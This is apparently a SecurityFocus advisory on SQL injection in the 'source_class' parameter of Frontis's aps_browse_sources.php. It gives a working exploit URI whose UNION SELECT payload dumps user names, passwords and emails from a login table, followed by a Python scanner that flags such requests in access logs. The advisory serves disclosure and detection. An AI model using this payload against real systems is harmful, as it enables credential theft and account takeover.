Frontis 'source_class' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/bin/aps_browse_sources.php?mode=browse_classes&source_class=1+UNION SELECT 1,group_concat(user_name,0x3a,user_pass,0x2e,user_email),3,4+from+login_table--
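
To find requests of this shape in web server access logs, the following added example (not part of the original advisory) flags any request to aps_browse_sources.php whose decoded source_class value is not a plain integer. The integer-only rule is an assumption drawn from the "source_class=1" prefix of the URI above, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption (not stated by the advisory): a legitimate source_class value
# is a plain integer, as in the "source_class=1" prefix of the example URI.
NUMERIC = re.compile(r"[0-9]+")
# SQL fragments of the kind seen in the advisory's URI, reported for triage.
SQL_TOKENS = re.compile(r"\b(?:union|select|from|group_concat)\b|--|0x[0-9a-f]+", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST) (.+?) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format); line 2 carries the
# advisory's query string with spaces percent-encoded as a browser sends them.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2010:10:00:00 +0000] "GET /bin/aps_browse_sources.php'
    '?mode=browse_classes&source_class=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2010:10:00:05 +0000] "GET /bin/aps_browse_sources.php'
    '?mode=browse_classes&source_class=1+UNION%20SELECT%201,group_concat(user_name,'
    '0x3a,user_pass,0x2e,user_email),3,4+from+login_table-- HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2010:10:00:09 +0000] "GET /index.php'
    '?source_class=abc HTTP/1.1" 200 128',
]

def check_request(target):
    """Return None for a benign request, else details of the bad source_class."""
    parts = urlsplit(target)
    if not parts.path.endswith("/aps_browse_sources.php"):
        return None
    # parse_qs decodes %XX and '+' the way the server-side script sees them.
    for value in parse_qs(parts.query, keep_blank_values=True).get("source_class", []):
        if NUMERIC.fullmatch(value):
            continue
        tokens = sorted({m.group(0).lower() for m in SQL_TOKENS.finditer(value)})
        return {"value": value, "sql_tokens": tokens}
    return None

def scan(log_lines):
    """Return (line_number, finding) for every suspicious request line."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        finding = check_request(match.group(1)) if match else None
        if finding:
            hits.append((lineno, finding))
    return hits

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE_LOG):
        print(lineno, finding)
```

The same integer-only check, applied in the application before the value reaches the query, rejects the request outright.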


 

Copyright 2010, SecurityFocus